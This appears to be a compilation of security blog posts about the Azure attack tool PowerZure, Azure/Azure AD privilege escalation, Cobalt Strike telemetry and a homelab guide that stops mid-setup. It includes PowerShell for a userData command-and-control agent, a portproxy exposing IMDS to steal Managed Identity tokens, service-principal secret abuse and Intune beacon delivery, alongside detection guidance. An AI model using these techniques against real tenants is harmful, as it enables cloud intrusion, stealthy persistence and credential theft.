PowerZure 2.1 Update

It’s been almost a year since my Azure exploitation project PowerZure received an update and in the changing world of Azure/cloud, that means several things broke. PowerZure will now continue to be my focus and receive regular support & updates, starting with the latest release, version 2.1. Several things have been changed and added, some of which need to be explained a bit.

Get-AzureManagedIdentities

This function gathers all Managed Identities in Azure. It works by listing all service principals and inspecting their application URIs: if a URI contains ‘identity.azure.net’, the service principal is a Managed Identity. PowerZure then maps each identity to its role assignments.
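A rough sketch of this approach with the Az module (not PowerZure’s exact implementation) might look like:

```powershell
# Hedged sketch: list service principals, keep those whose URI contains
# 'identity.azure.net', then map each Managed Identity to its role assignments.
$managedIdentities = Get-AzADServicePrincipal |
    Where-Object { $_.ServicePrincipalNames -match 'identity\.azure\.net' }

foreach ($mi in $managedIdentities) {
    Get-AzRoleAssignment -ObjectId $mi.Id |
        Select-Object DisplayName, RoleDefinitionName, Scope
}
```

Running this requires an authenticated Az session with read access to Azure AD and RBAC assignments.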

Figure 1: Viewing Managed Identities in Azure

Invoke-AzureCustomScriptExtension

Currently this is a wrapper cmdlet; however, once a bug in the Azure REST API is fixed, it will allow execution on VMs via CustomScriptExtension without requiring any files.

Get-AzurePIMAssignment

I don’t know why the Az module didn’t have a cmdlet for requesting PIM assignments, so I made one. Currently this only gathers AzureRM assignments. The AzureAD cmdlet for PIM is currently broken, as the underlying Graph API request returns a 401 for any user.

Figure 2: Getting the PIM assignments in Azure.

Invoke-AzureVMUserDataAgent & Invoke-AzureVMUserDataCommand

These two functions abuse the ‘userData’ property on virtual machines in Azure.

Figure 3: The ‘userdata’ field on a VM.

The userData field can be updated by users with VM write access, and the VM can retrieve this property internally from the IMDS REST API. By setting up an “agent” (in this function’s context, a Scheduled Task), the VM can routinely check the userData property for any commands passed in and execute them.
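Deploying such an agent could look roughly like the sketch below. The script path matches the artifact PowerZure leaves behind; the real agent uses an event-based trigger, while a one-minute repetition interval is shown here for simplicity.

```powershell
# Hypothetical sketch: register a task that repeatedly runs the polling script.
$action  = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-WindowStyle Hidden -File C:\WindowsAzure\SecAgent\AzureInstanceMetadataService.ps1'
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1)
Register-ScheduledTask -TaskName 'AzureInstanceMetadataService' -Action $action -Trigger $trigger -User 'SYSTEM'
```

Registering a task as SYSTEM requires an elevated session on the VM, which is why Invoke-AzVMRunCommand is needed once for setup.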

Figure 4: Abuse architecture for userData property.

The output is then written back into the userData property, which is readable by anyone with VM Read access. While a bit complex, this method of command execution leaves behind no logs in the Azure Activity Log. This technique can be abused with Invoke-AzureVMUserDataAgent, which deploys the “agent” (a scheduled task and a few supporting pieces), and with Invoke-AzureVMUserDataCommand, which passes a command into the userData property and waits for output from the agent.

Invoke-AzureMIBackdoor

Invoke-AzureMIBackdoor abuses the fact that Azure VMs do not require authentication to request data from the IMDS REST API. When a Managed Identity is configured on an Azure VM, the VM can request a JSON Web Token (JWT) to log in as the MI via a request to IMDS. Since the VM can do this without authentication, it can be abused by exposing the IMDS REST API to the internet. By default, the IMDS REST API is only accessible internally to the VM, but through portproxying it can be exposed to the internet, which allows anyone to request a JWT for the Managed Identity. Once again, this leaves behind no logs in the Azure Activity Log and can be used as a very stealthy persistence mechanism.

This function uses RDP’s port for portproxying by default, meaning web requests to the VM over 3389 are forwarded to IMDS. This breaks RDP until that portproxy rule is removed. PowerZure’s -NoRDP option instead opens a firewall port in the Network Security Group (NSG) if you want to use a different port, though this will obviously generate more logs.
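Under the hood, the redirection and the resulting external token request look roughly like this (the placeholder IP and exact commands are illustrative, not necessarily what PowerZure runs):

```powershell
# On the VM (elevated): forward inbound traffic on 3389 to IMDS.
# RDP is broken until this portproxy rule is deleted.
netsh interface portproxy add v4tov4 listenport=3389 listenaddress=0.0.0.0 connectport=80 connectaddress=169.254.169.254

# From the internet: request a JWT for the VM's Managed Identity.
Invoke-RestMethod -Headers @{ Metadata = 'true' } -Uri 'http://<vm-public-ip>:3389/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/'
```

The returned access token can then be used against the Azure REST API with whatever roles the Managed Identity holds.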

Figure 5: Requesting an MI JWT from the internet.

Bug Fixes

  • Add-AzureSPSecret – now uses the Azure REST API instead of cmdlets to add a secret to a service principal. The secret is auto-generated. If you get a 405 error, ensure you have the correct permissions and are logged in with the correct account.
  • Gathering Graph API tokens is now more reliable, and they shouldn’t expire.
  • Get-AzureADUserMembership has been fixed.
  • Get-AzureTargets is now more reliable, with neater output.
  • Set-AzureSubscription is now an interactive menu, useful for not having to remember or write down UIDs.

Thank you for the continued support of PowerZure. I’m more than happy to help anyone with debugging issues; you can reach out to me directly on Twitter.

Abusing and Detecting Alternative Data Channel Command Execution on Azure Virtual Machines

Currently, command execution on virtual machines (VMs) in Azure happens through the cmdlet Invoke-AzVMRunCommand. There are other specific ways, such as using an Azure Runbook if a RunAs account is being used. However, after some experimentation, there is another data channel that can be abused on Azure VMs, allowing an attacker to run commands on a machine without the use of Invoke-AzVMRunCommand* by leveraging userData. The asterisk (*) is there because, technically, Invoke-AzVMRunCommand is needed once to set up this technique. Before getting into the code and examples, a few things must be covered.

The userData field on an Azure VM is used to include setup scripts or other metadata during provisioning. Through the portal, it looks like this:

Figure 1: Modifying the ‘user data’ field on an Azure VM.

While intended to be used for provisioning, it is also possible to modify the contents of this property even after the VM is created. The VM is able to fetch this property through a REST API call.

$userData = Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -NoProxy -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-01-01&format=text"
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))
Figure 2: Calling the REST API to gather the ‘userdata’ property contents from within the VM.

The REST API in this case runs on the Azure Instance Metadata Service (IMDS). IMDS is intended to be queryable from the VM in order to fetch metadata about itself, such as name, region, disk space, etc. It is only reachable from localhost, as the security boundary for IMDS is the resource it is bound to, which in this case is the virtual machine. The userData property can thus be retrieved locally on the VM over 169.254.169.254 via IMDS, and it can also be edited through the Azure portal and the Azure REST API.

Invoke-RestMethod -Method PATCH -Uri https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachines/{vmName}?api-version=2021-07-01 -Body $Json -Header $Headers -ContentType 'application/json'
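A hedged sketch of what the $Json body and $Headers above might contain (the userData field per the Virtual Machines REST API; token acquisition via the Az module is one of several options):

```powershell
# Hypothetical sketch: build the PATCH body that sets userData.
$command = 'whoami'
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($command))
$Json    = @{ properties = @{ userData = $encoded } } | ConvertTo-Json -Depth 3
$Headers = @{ Authorization = "Bearer $((Get-AzAccessToken).Token)" }
```

Note that userData must be base64-encoded before upload, matching the decode step shown in Figure 2.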

While the local VM can query the IMDS REST API with a GET request, GET is the only approved verb; PUT and PATCH are not possible against the http://169.254.169.254/metadata/instance URI, so the local VM cannot modify any metadata (including userData) through IMDS. The metadata can only be modified with the Azure REST API. The permission needed to modify this property is Microsoft.Compute/virtualMachines/write, which is included in the typical VM management RBAC roles (VM Contributor, Contributor, etc.).

To summarize:

  • VMs can locally retrieve the userData property from the IMDS REST API
  • Users can modify this property through the portal or Azure REST API

The hypothesized technique then looks like this:

The first challenge was then automating the Azure VM to poll the IMDS REST API for the userData field. If commands are constantly sent, then the VM will have to autonomously make the request to IMDS, decode the command, then run the command. Basically, the VM needs an agent. The simplest method I could think of for a basic agent, was to create a PowerShell script that can be uploaded with Invoke-AzVMRunCommand and will do three things:

  1. Create a Scheduled Task that runs the script when an Event occurs. The chosen event was an Azure-specific event ID that fires several times every minute, ensuring the script is constantly executing.
  2. Make the IMDS REST API request to retrieve the uploaded data/command.
  3. Run the command and upload the result back to the userData field.

The final challenge was sending back the output of the command that was run. VMs cannot upload data to IMDS, but uploading over the Azure REST API is possible, so including the Azure REST access token in the originally uploaded data allows the VM to make authenticated requests to the Azure REST API via the https://management.azure.com/subscriptions/ URI, which does support PATCH & PUT.
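Putting the pieces together, a minimal agent loop might look like this sketch (the $payload field names Command, Token, and VMUri are hypothetical, not PowerZure’s actual format):

```powershell
# Hypothetical agent sketch: fetch userData from IMDS, run the command,
# and PATCH the output back using the smuggled Azure REST access token.
$raw = Invoke-RestMethod -Headers @{ Metadata = 'true' } -Uri 'http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-01-01&format=text'
$payload = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($raw)) | ConvertFrom-Json

$output     = Invoke-Expression $payload.Command | Out-String
$outEncoded = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($output))
$body       = @{ properties = @{ userData = $outEncoded } } | ConvertTo-Json -Depth 3

Invoke-RestMethod -Method PATCH -Uri $payload.VMUri -Body $body -ContentType 'application/json' -Headers @{ Authorization = "Bearer $($payload.Token)" }
```

This only works while the smuggled access token remains valid, which is one practical limit of the channel.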

To summarize the full technique:

  • By using Invoke-AzVMRunCommand, a PowerShell script is uploaded that will act as an “agent”. The script is autonomous and will deploy a Scheduled Task that will execute the rest of the script on an Event.
  • The initial upload to the userData field will contain both the arbitrary command to be run and the Azure REST API access token.
  • The VM will call the IMDS REST API to get the contents of the userData property, decode it, run the command, then use the Azure REST API to make a PUT request to upload the results of the command, which is done by using the smuggled access token.
  • The userData property can then be queried again to see the results of the command.

In PowerZure, this can now be accomplished with the two commands Invoke-AzureVMUserDataCommand and Invoke-AzureVMUserDataAgent.

Detection and Threat Hunting Azure Alternate Data Channels

There are several assumptions that must hold for this attack to be successful.

  1. The account used to upload data has VM write privileges
  2. Invoke-AzVMRunCommand is able to be executed by users without approval
  3. The VM is on and running

If any of these assumptions are not true, the technique will fail. In addition, there are several artifacts left behind by this technique.

  • The scripting agent from PowerZure is located in C:\WindowsAzure\SecAgent\AzureInstanceMetadataService.ps1
  • Invoke-AZVmRunCommand leaves behind the command or script that was run in C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\1.1.9\Downloads

Within Azure, Invoke-AzVMRunCommand will leave behind a log in the Activity log.

These logs should always trigger alerts and should be reviewed. Finally, since commands are executed from within the PowerShell script agent, PowerShell logging will capture all activity. I have personally never seen the ‘userData’ field populated in the Azure portal, so check if anything is there and review its purpose.

Acknowledgements

Special thank you to @_wald0, @jsecurity101, and @matterpreter.

Attacking Azure & Azure AD, Part II

Abstract

When I published my first article, Attacking Azure & Azure AD and Introducing PowerZure, I had no idea I was just striking the tip of the iceberg. Over the past eight months, my co-worker Andy Robbins and I have continued to do a lot of research on the Azure front. We’ve recently found some interesting attack primitives in customer environments that we wouldn’t have normally thought of in a lab. This blog post will cover these attack primitives, as well as introduce the re-write of PowerZure by releasing PowerZure 2.0 along with this article.

Azure vs. Azure AD

Before I jump straight into the attacks, I want to clarify some confusion around Azure & Azure Active Directory (AD), as I know this boggled my mind for quite some time.

Azure AD is simply the authentication component for both Azure and Office 365. When I speak of Azure (without the “AD”) I’m referring to Azure resources; where subscriptions, resource groups, and resources live.

The biggest thing to know about these two components is that their role-based access control systems are separate: a role in Azure AD does not give you that role in Azure. In fact, the roles are completely different between the two and share no common role definitions.

Roles in Azure & Azure AD are simply containers for things called ‘definitions’. Definitions are composed of ‘actions’ and ‘notactions’, which allow you to do things on certain objects. For example, the role definition for the ‘Global Administrator’ role in Azure AD looks like this:

$a = Get-AzureADMSRoleDefinition | Where-Object {$_.DisplayName -eq 'Company Administrator'}
$a.RolePermissions.AllowResourceActions
Figure 1: List of actions from the role definition of the Global/Company Administrator role in Azure AD

Notice the ‘microsoft.directory’ namespace. That entire namespace is restricted to Azure AD.

Comparatively, the role definition for ‘Contributor’ in Azure looks like this:

Get-AzRoleDefinition

Figure 2: List of actions and not actions for the ‘Contributor’ role in Azure

Notice that for the Contributor role in Azure, the ‘Actions’ property has a wildcard (*). This means it can do anything to resources in Azure. However, the ‘NotActions’ property defines what it cannot do; for the Contributor role, that means it cannot add or remove users on resources, because Microsoft.Authorization/*/Write is listed under NotActions. That capability is restricted to the ‘Owner’ role.
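These properties can be inspected directly with the Az module:

```powershell
# Pull the Contributor role definition and inspect its Actions/NotActions.
$role = Get-AzRoleDefinition -Name 'Contributor'
$role.Actions      # '*' - Contributor can do anything to resources...
$role.NotActions   # ...except what is listed here, e.g. Microsoft.Authorization/*/Write
```

The same pattern works for any built-in or custom role name.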

Azure AD Privilege Escalation via Service Principals

Applications exist at the Azure AD level, and if an application needs to perform an action in Azure or Azure AD, it requires a service principal account to do so. Most of the time, service principals are created automatically and rarely require user intervention. On a recent engagement, we discovered an application’s service principal was a Global Administrator in Azure AD. We then scrambled to find out how to abuse this, as it’s well known that you can log in to Azure PowerShell as a service principal. We then looked at the ‘Owners’ tab of the application and saw a regular user listed as an Owner.

Figure 3: Example of the ‘Owners’ tab on an application

Owners of applications have the ability to add ‘secrets’ or passwords (as well as certificates) to the application’s service principal so that someone can log in as the service principal.

Figure 4: Example of the ‘Certificates and Secrets’ tab on an application

The low-privileged user could then add a new secret to the service principal and log in to Azure PowerShell as that service principal, which has Global Administrator rights.
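A sketch of that path with the Az module (placeholder IDs; property names such as SecretText vary between Az versions):

```powershell
# Hypothetical sketch: as an application Owner, add a credential to the app,
# then log in to Azure PowerShell as its service principal.
$secret = New-AzADAppCredential -ApplicationId '<app-id>'   # secret is auto-generated
$pass   = ConvertTo-SecureString $secret.SecretText -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential('<app-id>', $pass)
Connect-AzAccount -ServicePrincipal -Credential $cred -Tenant '<tenant-id>'
```

From that point on, every action runs with whatever roles the service principal holds.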

The next question we had was how far this could be abused. As Global Administrator, we control Azure AD, but how can we control Azure resources?

Sean Metcalf published an article explaining that Global Administrators have the ability to click a button in the Azure portal to give themselves the ‘User Access Administrator’ role in Azure. This role allows you to add and remove users to resources, resource groups, and subscriptions, effectively meaning you can just add yourself as an Owner to anything Azure.

At first glance, this toggle switch looked to be available only in the portal, and since service principals cannot log in to the portal, I thought I was out of luck. After digging through some Microsoft documentation, I found there’s an API call that can make that change. After making this a function in PowerZure (Set-AzureElevatedPrivileges), I logged into Azure PowerShell as the service principal and executed the function, which gave an odd result.
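The API call in question is the documented elevateAccess endpoint; invoking it directly looks roughly like:

```powershell
# Sketch: call elevateAccess as the current (Global Administrator) user.
# On success, the caller is granted User Access Administrator at root scope.
$token = (Get-AzAccessToken).Token
Invoke-RestMethod -Method POST -Headers @{ Authorization = "Bearer $token" } -Uri 'https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01'
```

The call returns no body on success; the new role assignment shows up at the "/" scope.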

Figure 5: Unknown errors are the best

As it turns out, after a GitHub issue was opened & answered, this API call cannot be executed by a service principal.

So putting our thinking caps back on, we thought of other things a Global Administrator can do — like creating a new user or assigning other roles! So, as the service principal, we created a new user, then also gave that user the Global Administrator role. I logged in as the new user, executed the API call, and it successfully added the ‘User Access Administrator’ role to them, meaning I now controlled Azure AD and Azure, which all started from a low-privileged user as an Owner on a privileged Application’s Service Principal.

Figure 6: The service principal privilege escalation abuse

Moving from Cloud to On-Premise

With Azure and Azure AD compromised, our next goal was to figure out a way to move from Azure into an on-premise domain. While exploring our options, we found that Microsoft’s Mobile Device Management (MDM) platform, Intune, isn’t just for mobile devices. Any device, including on-premise workstations & servers, can be added to Intune. Intune allows administrators to perform basic administrative tasks on Azure AD-joined devices, such as restarting them or deploying software packages. One of the things we saw was that you can upload PowerShell scripts to Intune, which will execute on a [Windows] device as SYSTEM. Intune is technically an Azure AD resource, meaning only roles in Azure AD affect it. Since we had Global Administrator privileges, we could upload PowerShell scripts at will to Intune. The devices we wanted to target, to move from cloud to on-premise, were ‘hybrid’-joined devices, meaning they were joined to both on-premise AD and Azure AD.

Figure 7: Windows 10 Device is Hybrid Azure AD Joined + Managed by Intune

To do this, we used the Azure Endpoint Management portal as our new user to upload the PowerShell script.

Figure 8: Adding a PowerShell script to Intune

In Intune, there’s no button to “execute” scripts; instead, they automatically execute when the machine is restarted and every hour thereafter. A few minutes after uploading the script (a Cobalt Strike beacon payload), we successfully got a beacon back and moved from cloud to on-premise.

Figure 9: Using InTune to gain access to a Windows Machine.

This can also be abused purely through PowerZure using the New-AzureIntuneScript and Restart-AzureVM functions.

Figure 10: Abusing InTune with PowerZure

Abusing Logic Apps

Of the many things we’ve researched in Azure, one interesting abuse we found came from a Logic App.

Azure Logic Apps is a cloud service that helps you schedule, automate, and orchestrate tasks, business processes, and workflows when you need to integrate apps, data, systems, and services across enterprises or organizations -Microsoft

Logic Apps have two components: a trigger and an action. A trigger is something that puts the action into effect. For example, you can make an HTTP request a trigger, so when someone visits the URL, the trigger fires the action(s). An action is what you want the logic app to actually do. There are hundreds of actions across multiple services, some from third-party applications, and you can even create a custom action (might be interesting).

Figure 11: List of services available that have actions in a logic app. Notice the scroll bar.

One that particularly stood out was AzureAD.

Figure 12: List of Azure AD actions available

Unfortunately, there weren’t any really juicy actions like adding a role to a user, but the ability to create a user was an interesting case for a backdoor, and adding a user to a group could mean privilege escalation if certain permissions or roles are tied to that group.

Figure 13: Example layout of a logic app. When that URL is visited, it creates an AAD group.

The question then was: “What privileges does this logic app action fire as?” The answer is that logic apps use a connector. A connector is an API that hooks an account into the logic app. Many of the available services have a connector, including Azure AD. The interesting part of this abuse was that when I logged into the connector, it persisted across accounts: when I logged out and switched to another account, my original account was still logged into the connector on the logic app.

Figure 14: The connector on the action of the logic app.

The abuse, then, is that if you’re a Contributor over a logic app that uses a connector, you can effectively use that connector account to perform any available actions, provided the connector account has the correct role for those actions.

Figure 15: ‘intern’ is a Contributor over the logic app, where ‘hausec’ is used as the connector account, meaning ‘intern’ can use ‘hausec’s roles for any available actions.

Due to the sheer number of actions available in a logic app, I chose not to implement this abuse into PowerZure at this time; however, you can enumerate whether a connector is being used with the Get-AzureLogicAppConnector function.

PowerZure 2.0

I’m happy to announce that I’ve re-written all of PowerZure to follow more proper coding practices, such as using approved PowerShell verbs, returning objects, and removing several wrapper functions. One of the biggest changes was the removal of the Azure CLI module requirement, as PowerZure now only requires the Az PowerShell & AzAD modules, reducing overhead for users. Some Azure AD functions have been converted to Graph API calls. Finally, all PowerZure functions now contain ‘Azure’ after the verb, e.g. Get-AzureTargets or Get-AzureRole.

If you haven’t already seen it, PowerZure now has a readthedocs page, which can be viewed here: https://powerzure.readthedocs.io/en/latest/. It has an overview of each function, its syntax & parameters, and example output. The aim is to make PowerZure much easier to adopt for people getting into Azure penetration testing & red teaming.

With PowerZure 2.0, there are some new functions being released:

  • Get-AzureSQLDB — Lists any available SQL databases, their servers, and the administrative user
  • Add-AzureSPSecret — Adds a secret to a service principal
  • Get-AzureIntuneScript — Lists the current Intune PowerShell scripts available
  • New-AzureIntuneScript — Uploads a PowerShell script to Intune which will execute by default against all devices
  • Get-AzureLogicAppConnector — Lists any connectors being used for logic apps
  • New-AzureUser — Will create a user in AAD
  • Set-AzureElevatedPrivileges — Elevates a user’s privileges in AAD to User Access Administrator in Azure if that user is a Global Administrator

As part of any upgrade, several old bugs were fixed and overall functionality has been greatly improved. My goal is to put any potential abuses for Azure & Azure AD into PowerZure, so as our research journey continues, I’m sure there will be more to come.


Special Thanks to @_wald0 for helping with some of the research mentioned here.

Cobalt Strike and Tradecraft

It’s been known that some built-in commands in Cobalt Strike are major op-sec no-no’s, but why are they bad? The goal of this post isn’t to teach you “good” op-sec, as I feel that is a bit subjective and dependent on the maturity of the target’s environment, nor is it “how to detect Cobalt Strike”. The purpose of this post is to document what some Cobalt Strike techniques look like under the hood, or from a defender’s point of view. Realistically, this post is just breaking down a page straight from Cobalt Strike’s website, which can be found here. I won’t be able to cover all techniques and commands in one article, so this will probably be a two-part series.

Before jumping into techniques and the logs associated with them, the baseline question must be answered: “What is bad op-sec?”. Again, this is an extremely subjective question. If you’re operating in an environment with zero defensive and detection capabilities, there is no bad op-sec. While the goal of this article isn’t to teach “good op-sec”, it still has a bias towards somewhat mature environments and certain techniques will be called out where they tend to trigger baseline or low-effort/default alerts & detections. My detection lab for the blog post is extremely simple: just an ELK stack with Winlogbeat & Sysmon on the endpoints, so I’m not covering “advanced” detections here.

Referencing the op-sec article from Cobalt Strike, the first set of built-in commands I’d like to point out are the ‘Process Execution’ techniques, which are run, shell, and pth.

These three commands tend to trigger several baseline alerts. Let’s investigate why.

Shell

When an operator uses the shell command in Cobalt Strike, it’s usually to execute a DOS command directly, such as dir, copy, move, etc. Under the hood, the shell command calls cmd.exe /c.

With Sysmon logging, this leaves a sequence of events, all around Event Code 1, Process Create.

We can see here that the shell command spawns cmd.exe under the parent process. whoami, though, is also actually an executable within System32, so cmd.exe spawns it as a child process. But before that occurs, conhost.exe is called in tandem with cmd.exe. Conhost.exe is a process that’s required for cmd.exe to interface with Explorer.exe. What is unique is how Conhost.exe is created:

In this case, Conhost.exe’s arguments are 0xffffffff -ForceV1, which tells Conhost which application ID it should connect to. Per Microsoft:

“The session identifier of the session that is attached to the physical console. If there is no session attached to the physical console, (for example, if the physical console session is in the process of being attached or detached), this function returns 0xFFFFFFFF.”

A goal of op-sec is to always minimize the amount of traffic, or “footprints”, that your activities leave behind. As you can see, shell generates quite a few artifacts, and it’s common for detections to pick it up, as cmd.exe /c is seldom used in environments.

PTH

The PTH, or pass-the-hash, command has even more indicators than shell.

From Cobalt Strike’s blog https://blog.cobaltstrike.com/2015/12/16/windows-access-tokens-and-alternate-credentials/:

“The pth command asks mimikatz to: (1) create a new Logon Session, (2) update the credential material in that Logon Session with the domain, username, and password hash you provided, and (3) copy your Access Token and make the copy refer to the new Logon Session. Beacon then impersonates the token made by these steps and you’re ready to pass-the-hash.”

This creates several events.

First, the ‘spawnto’ process that is dictated in the Cobalt Strike profile is created, which in my case is dllhost.exe. This becomes a child process of the current process. This is used as a sacrificial process in order to “patch” in the new logon session & credentials.

Then a new logon session is created with special privileges, generating event ID 4672.

The account then logs on to that new session and another event is created with the ID of 4624.

In this new logon session, cmd.exe is spawned as a child process of dllhost.exe and a string is passed into a named pipe as a unique identifier.

Now, according to the logon session attached to the parent process (dllhost.exe), ADMAlice is the logged in user.

Finally, Conhost.exe is again called since cmd.exe is called. The unique arguments that hide the cmd.exe window are passed into Conhost.

Now, whenever the operator attempts to login to a remote host, the new logon session credential will be attempted first.

Run

The run command is a bit different from PTH and Shell: it does not spawn cmd.exe and instead calls the target executable directly.

Once again though, Conhost is called with the unique arguments.

While the arguments for Conhost aren’t inherently malicious, it is a common identifier for these commands.

execute works similarly to run, however no output is returned.

Powershell

The powershell command, as you can probably guess, runs a command through PowerShell. Powershell.exe is spawned as a child process but the parent PID can be changed with the ppid command. In this case, though, the ppid is kept to the original parent process.

Conhost is again called.

The major problem with the powershell command is that it always adds unique arguments to the command and encodes the command in base64.

This results in a highly signature-able technique, as it is not common to see legitimate PowerShell scripts run base64-encoded with the -exec bypass flag.
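For reference, the encoding Beacon applies is the standard -EncodedCommand scheme (UTF-16LE bytes, base64 encoded):

```powershell
# How an encoded PowerShell one-liner is built: UTF-16LE, then base64.
$cmd     = 'whoami'
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($cmd))
# Beacon then runs something like: powershell -nop -exec bypass -EncodedCommand $encoded
$encoded   # dwBoAG8AYQBtAGkA
```

Defenders can decode any such blob the same way in reverse, which is why base64-plus-bypass-flag command lines are an easy signature.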

Powerpick

Powerpick is a command that uses the “fork-and-run” technique, meaning Cobalt Strike creates a sacrificial process to run the command under, returns the output, then kills the process. The name of the spawnto process is defined in the Cobalt Strike profile on the teamserver. In my case, it’s dllhost.exe.

When running a powerpick command, such as powerpick whoami, three processes are created: Dllhost.exe (SpawnTo process), Conhost.exe, and whoami.exe.

While Powerpick does not spawn powershell.exe, there are still op-sec considerations. In this case, the behavior would look somewhat suspicious because the parent process of ‘whoami.exe’ is ‘dllhost.exe’. Typically, when a user runs ‘whoami’, it’s going to be in the context of cmd.exe or powershell.exe.

Figure 1: What a normal use of ‘whoami’ looks like

The op-sec consideration here is to be aware of what your parent process is and what process you’ll be spawning. Always try to keep parent-child process relationships as ‘normal’ looking as possible. Dllhost.exe with a child process of ‘whoami.exe’ is not normal.

Similarly, these other commands utilize the “fork-and-run” technique and you can expect similar events:

  • chromedump
  • covertvpn
  • dcsync
  • execute-assembly
  • hashdump
  • logonpasswords
  • mimikatz
  • net *
  • portscan
  • pth
  • ssh
  • ssh-key

Spawnas

The spawnas command will create a new session as another user by supplying their credentials and a listener.

Since this is effectively just re-deploying a payload on the host, there are several events associated with it.

First, a special logon session is created

If the spawnas command is run as an elevated user, the new session will have a split token, meaning two sessions are created: One privileged and another unprivileged.

Next, a 4648 event will be created, notifying of a logon with explicitly provided credentials

Then a new process will be created under that new session, which is whatever the spawnto process is set in the profile.

That process is now the beacon process for that logon session and user. It’s a child process of the original beacon’s process.

There are several techniques that were not covered in this post that are considered more “op-sec” friendly, as they do not leave behind glaringly obvious events like the ones covered so far. Some examples are:

  • Beacon Object Files (BOF)
  • Shinject
  • API-Only calls such as upload, mkdir, downloads, etc.

I do plan on covering detection for these in a later post.

Creating a Red & Blue Team Homelab

Over the years of penetration testing, red teaming, and teaching, I (and I’m sure a lot of others) have often been asked how to get started in infosec; more specifically, how to become a pentester/red teamer or threat hunter/blue teamer. One of the things I always recommend is to build out a lab so you can test TTPs (tactics, techniques, and procedures) and generate IOCs (indicators of compromise), so that you can understand how an attack works and what noise it generates, with the aim being either to detect that attack or to modify it so it’s harder to detect. It’s not really an opinion, but a matter of fact, that being a better blue teamer will make you a better red teamer and vice-versa. In addition, one of the things that I ask in interviews, and have always been asked in interviews, is to describe your home lab. It’s almost an expectation, as it is so crucial to be able to experiment with TTPs in a non-production environment. This post aims to help you create a home lab that supports both red team and blue team activity.

Hardware

One of the first questions asked about a home lab is the cost. There are a few ways to answer this:

  1. Host everything locally on your PC/laptop.
  2. Host everything on a dedicated server
  3. Host everything in the cloud

The other question is what the necessary size of the lab is. Home labs do not have to replicate the size of an enterprise company. My home lab is set up as shown below, which will act as the template for this post.

Figure 1: One of many ways to set up a home lab

In my personal lab I run two Windows Servers and three Windows workstations. You could absolutely have just one server and one workstation; it’s just a matter of what you’re trying to accomplish. So, to answer the question of “what will it cost”, the answer is “it depends”. Personally, I use a computer acting as a server, which cost me about $400 to build and runs ESXi 7 to host all the VMs. Cloud could initially be cheaper, but in the long run it will probably cost more. I used to run everything locally on my work PC, but I started to run out of disk space with all the VMs. As far as this guide goes, however you choose to host your VMs is up to you.

Hosting OS links:

Server Operating Systems:

ESXi 7

Hyper-V

Workstation Applications:

VMware Workstation Player

VirtualBox

Cloud:

AWS

Azure

Architecture

How your lab is architected/laid out is a big deal. You want to mimic a real environment as much as possible, which is why I suggest building a lab that runs Windows Active Directory (AD). I don't think I've ever been in an environment where AD was not being used. We will start by using Windows evaluation licenses.

Windows 10

Windows Server 2019

And we will use Debian 10 to build an ELK (Elasticsearch, Logstash, Kibana) server.

Debian 10

Finally, for our attacking machine and for simplicity, we will just use Kali.

Kali Linux

ELK Setup

Before setting up Windows, we will set up an ELK server. ELK (Elasticsearch, Logstash, Kibana) is a widely used platform for log processing. As a blue teamer, you want this because digging through logs is a key part of threat hunting. As a red teamer, you want it so you know what IOCs the TTPs you use generate.

Keep in mind this lab is meant to be for internal, private use only. The setup of these servers will not be secure and should not be used in a production environment.

Start off by downloading the Debian 10 ISO, then create a VM that boots from the ISO. I won't go into the specifics of creating a VM as it's platform-specific (e.g. VirtualBox, VMware, etc.), but there's a good article here for VMware.

Once you install Debian and log in, you'll want to first add your user to the sudo group so it can run administrative commands. First, switch to root (using the root password you set during installation):

su -

Then add your user to the sudo group:

usermod -aG sudo [username]

Then switch back to your user (su starts a fresh login, so the new group membership takes effect):

su - [username]
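Group membership is a common stumbling block here, so this optional sketch (plain shell, nothing assumed beyond coreutils) checks whether your current session has actually picked up the sudo group:

```shell
# List the groups of the current session. If "sudo" is missing even after
# usermod, the session predates the change: start a fresh login session
# (log out and back in, or `su - [username]`) so the membership is loaded.
MY_GROUPS=$(id -nG)
case " $MY_GROUPS " in
  *" sudo "*) echo "sudo group: yes" ;;
  *)          echo "sudo group: no (start a fresh login session)" ;;
esac
```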

Next, add the GPG key for the Elastic repository

wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -

And add the repository definition

echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list

Now update apt

sudo apt-get update

And install logstash

sudo apt-get install logstash

Then Java

sudo apt-get install openjdk-11-jre

Then install Elasticsearch

sudo apt-get install elasticsearch

and finally Kibana

sudo apt-get install kibana

Next, enable the services so they start automatically at boot

sudo /bin/systemctl enable elasticsearch.service && sudo /bin/systemctl enable kibana.service && sudo /bin/systemctl enable logstash.service

Before we start the services, there’s a few config changes we need to make.

sudo nano /etc/kibana/kibana.yml

Uncomment server.host and set the IP to 0.0.0.0 to listen on all interfaces, and uncomment server.port. You can leave the port at 5601.

Figure 2: Setting the Kibana Config file
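For reference, the two uncommented lines in kibana.yml should end up looking roughly like this (everything else in the file can stay commented out):

```yaml
server.port: 5601
server.host: "0.0.0.0"
```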

Save the file (ctrl+O, Enter, ctrl+x)

and now edit the elasticsearch config file

sudo nano /etc/elasticsearch/elasticsearch.yml

Set the network.host line to 0.0.0.0 and http.port to 9200

Figure 3: Setting the Elasticsearch config settings

And add an additional line at the bottom

discovery.type: single-node
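Taken together, the modified lines in elasticsearch.yml should look roughly like this (single-node mode skips the production bootstrap checks, which is fine for a private lab):

```yaml
network.host: 0.0.0.0
http.port: 9200
discovery.type: single-node
```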

